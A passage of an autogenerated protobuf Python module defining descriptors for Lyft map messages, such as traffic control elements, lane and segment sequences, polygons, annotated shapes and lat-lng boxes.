serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_yellow_u_turn', full_name='pb.lyft.maps.TrafficControlElement.signal_yellow_u_turn', index=22,
number=45, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_green_u_turn', full_name='pb.lyft.maps.TrafficControlElement.signal_green_u_turn', index=23,
number=46, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='speed_bump', full_name='pb.lyft.maps.TrafficControlElement.speed_bump', index=24,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='speed_hump', full_name='pb.lyft.maps.TrafficControlElement.speed_hump', index=25,
number=34, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pedestrian_crosswalk', full_name='pb.lyft.maps.TrafficControlElement.pedestrian_crosswalk', index=26,
number=16, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='keep_clear_zone', full_name='pb.lyft.maps.TrafficControlElement.keep_clear_zone', index=27,
number=17, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pedestrian_crossing_sign', full_name='pb.lyft.maps.TrafficControlElement.pedestrian_crossing_sign', index=28,
number=18, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_ahead_sign', full_name='pb.lyft.maps.TrafficControlElement.signal_ahead_sign', index=29,
number=19, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_left_turn_sign', full_name='pb.lyft.maps.TrafficControlElement.no_left_turn_sign', index=30,
number=20, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_right_turn_sign', full_name='pb.lyft.maps.TrafficControlElement.no_right_turn_sign', index=31,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='left_turn_yield_on_green_sign', full_name='pb.lyft.maps.TrafficControlElement.left_turn_yield_on_green_sign', index=32,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_parking_sign', full_name='pb.lyft.maps.TrafficControlElement.no_parking_sign', index=33,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='one_way_sign', full_name='pb.lyft.maps.TrafficControlElement.one_way_sign', index=34,
number=24, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='school_zone_sign', full_name='pb.lyft.maps.TrafficControlElement.school_zone_sign', index=35,
number=25, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parking_zone', full_name='pb.lyft.maps.TrafficControlElement.parking_zone', index=36,
number=35, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='speed_bump_sign', full_name='pb.lyft.maps.TrafficControlElement.speed_bump_sign', index=37,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='construction_zone', full_name='pb.lyft.maps.TrafficControlElement.construction_zone', index=38,
number=49, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='stop_here_for_pedestrians_sign', full_name='pb.lyft.maps.TrafficControlElement.stop_here_for_pedestrians_sign', index=39,
number=50, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state_law_stop_for_pedestrian_in_crosswalk_sign', full_name='pb.lyft.maps.TrafficControlElement.state_law_stop_for_pedestrian_in_crosswalk_sign', index=40,
number=51, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yield_here_for_pedestrians_sign', full_name='pb.lyft.maps.TrafficControlElement.yield_here_for_pedestrians_sign', index=41,
number=52, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='turning_vehicles_yield_to_pedestrians_sign', full_name='pb.lyft.maps.TrafficControlElement.turning_vehicles_yield_to_pedestrians_sign', index=42,
number=53, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state_law_yield_for_pedestrian_sign', full_name='pb.lyft.maps.TrafficControlElement.state_law_yield_for_pedestrian_sign', index=43,
number=54, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='railroad_crossing_regulatory_sign', full_name='pb.lyft.maps.TrafficControlElement.railroad_crossing_regulatory_sign', index=44,
number=55, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='railroad_crossing_warning_sign', full_name='pb.lyft.maps.TrafficControlElement.railroad_crossing_warning_sign', index=45,
number=56, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='railroad_crossing_other_sign', full_name='pb.lyft.maps.TrafficControlElement.railroad_crossing_other_sign', index=46,
number=57, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='roundabout_circulation_sign', full_name='pb.lyft.maps.TrafficControlElement.roundabout_circulation_sign', index=47,
number=58, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='roundabout_directional_sign', full_name='pb.lyft.maps.TrafficControlElement.roundabout_directional_sign', index=48,
number=59, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='roundabout_other_sign', full_name='pb.lyft.maps.TrafficControlElement.roundabout_other_sign', index=49,
number=60, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_left_turn_on_red_sign', full_name='pb.lyft.maps.TrafficControlElement.no_left_turn_on_red_sign', index=50,
number=61, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_right_turn_on_red_sign', full_name='pb.lyft.maps.TrafficControlElement.no_right_turn_on_red_sign', index=51,
number=62, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_turn_on_red_sign', full_name='pb.lyft.maps.TrafficControlElement.no_turn_on_red_sign', index=52,
number=63, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='do_not_enter_sign', full_name='pb.lyft.maps.TrafficControlElement.do_not_enter_sign', index=53,
number=64, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_u_turn_sign', full_name='pb.lyft.maps.TrafficControlElement.no_u_turn_sign', index=54,
number=65, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_left_and_u_turn_sign', full_name='pb.lyft.maps.TrafficControlElement.no_left_and_u_turn_sign', index=55,
number=66, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_straight_through_sign', full_name='pb.lyft.maps.TrafficControlElement.no_straight_through_sign', index=56,
number=67, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='left_turn_only_sign', full_name='pb.lyft.maps.TrafficControlElement.left_turn_only_sign', index=57,
number=68, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='right_turn_only_sign', full_name='pb.lyft.maps.TrafficControlElement.right_turn_only_sign', index=58,
number=69, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='u_turn_only_sign', full_name='pb.lyft.maps.TrafficControlElement.u_turn_only_sign', index=59,
number=70, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='straight_through_only_sign', full_name='pb.lyft.maps.TrafficControlElement.straight_through_only_sign', index=60,
number=71, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='other_turn_restriction_sign', full_name='pb.lyft.maps.TrafficControlElement.other_turn_restriction_sign', index=61,
number=72, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='construction_zone_sign', full_name='pb.lyft.maps.TrafficControlElement.construction_zone_sign', index=62,
number=73, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='geo_frame', full_name='pb.lyft.maps.TrafficControlElement.geo_frame', index=63,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='points_x_deltas_cm', full_name='pb.lyft.maps.TrafficControlElement.points_x_deltas_cm', index=64,
number=3, type=17, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='points_y_deltas_cm', full_name='pb.lyft.maps.TrafficControlElement.points_y_deltas_cm', index=65,
number=4, type=17, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='points_z_deltas_cm', full_name='pb.lyft.maps.TrafficControlElement.points_z_deltas_cm', index=66,
number=5, type=17, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='geometry_type', full_name='pb.lyft.maps.TrafficControlElement.geometry_type', index=67,
number=48, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='controlled_paths', full_name='pb.lyft.maps.TrafficControlElement.controlled_paths', index=68,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK, _TRAFFICCONTROLELEMENT_AUXILIARYELEMENT, _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE, _TRAFFICCONTROLELEMENT_TRAFFICLIGHT, ],
enum_types=[
_TRAFFICCONTROLELEMENT_GEOMETRYTYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='Type', full_name='pb.lyft.maps.TrafficControlElement.Type',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=4897,
serialized_end=10334,
)
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION = _descriptor.Descriptor(
name='SegmentWithOrientation',
full_name='pb.lyft.maps.SegmentSequence.SegmentWithOrientation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='segment', full_name='pb.lyft.maps.SegmentSequence.SegmentWithOrientation.segment', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='orientation', full_name='pb.lyft.maps.SegmentSequence.SegmentWithOrientation.orientation', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION_ORIENTATION,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10479,
serialized_end=10686,
)
_SEGMENTSEQUENCE = _descriptor.Descriptor(
name='SegmentSequence',
full_name='pb.lyft.maps.SegmentSequence',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='pb.lyft.maps.SegmentSequence.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='segments', full_name='pb.lyft.maps.SegmentSequence.segments', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION, ],
enum_types=[
_SEGMENTSEQUENCE_TYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10337,
serialized_end=10737,
)
_LANESEQUENCE = _descriptor.Descriptor(
name='LaneSequence',
full_name='pb.lyft.maps.LaneSequence',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='lanes', full_name='pb.lyft.maps.LaneSequence.lanes', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10739,
serialized_end=10792,
)
_LANESEQUENCES = _descriptor.Descriptor(
name='LaneSequences',
full_name='pb.lyft.maps.LaneSequences',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='lane_sequences', full_name='pb.lyft.maps.LaneSequences.lane_sequences', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10794,
serialized_end=10861,
)
_POLYGON = _descriptor.Descriptor(
name='Polygon',
full_name='pb.lyft.maps.Polygon',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='shell_vertices', full_name='pb.lyft.maps.Polygon.shell_vertices', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='holes', full_name='pb.lyft.maps.Polygon.holes', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10863,
serialized_end=10961,
)
_MULTIPOLYGON = _descriptor.Descriptor(
name='MultiPolygon',
full_name='pb.lyft.maps.MultiPolygon',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='polygons', full_name='pb.lyft.maps.MultiPolygon.polygons', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10963,
serialized_end=11018,
)
_ANNOTATEDSHAPE_BUILDING = _descriptor.Descriptor(
name='Building',
full_name='pb.lyft.maps.AnnotatedShape.Building',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='pb.lyft.maps.AnnotatedShape.Building.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='height_meters', full_name='pb.lyft.maps.AnnotatedShape.Building.height_meters', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='above_ground_floors', full_name='pb.lyft.maps.AnnotatedShape.Building.above_ground_floors', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_ANNOTATEDSHAPE_BUILDING_TYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11447,
serialized_end=11740,
)
_ANNOTATEDSHAPE_REGION = _descriptor.Descriptor(
name='Region',
full_name='pb.lyft.maps.AnnotatedShape.Region',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='source', full_name='pb.lyft.maps.AnnotatedShape.Region.source', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11742,
serialized_end=11766,
)
_ANNOTATEDSHAPE = _descriptor.Descriptor(
name='AnnotatedShape',
full_name='pb.lyft.maps.AnnotatedShape',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='pb.lyft.maps.AnnotatedShape.name', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='multipolygon', full_name='pb.lyft.maps.AnnotatedShape.multipolygon', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='building', full_name='pb.lyft.maps.AnnotatedShape.building', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='region', full_name='pb.lyft.maps.AnnotatedShape.region', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='venue', full_name='pb.lyft.maps.AnnotatedShape.venue', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='administrative_boundary', full_name='pb.lyft.maps.AnnotatedShape.administrative_boundary', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='park', full_name='pb.lyft.maps.AnnotatedShape.park', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='drivable_surface_prior', full_name='pb.lyft.maps.AnnotatedShape.drivable_surface_prior', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_ANNOTATEDSHAPE_BUILDING, _ANNOTATEDSHAPE_REGION, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='Type', full_name='pb.lyft.maps.AnnotatedShape.Type',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=11021,
serialized_end=11774,
)
_LATLNGBOX = _descriptor.Descriptor(
name='LatLngBox',
full_name='pb.lyft.maps.LatLngBox',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='south_west', full_name='pb.lyft.maps.LatLngBox.south_west', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='north_east', full_name='pb.lyft.maps.LatLngBox.north_east', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11776,
serialized_end=11881,
)
_MAPELEMENT_ELEMENT = _descriptor.Descriptor(
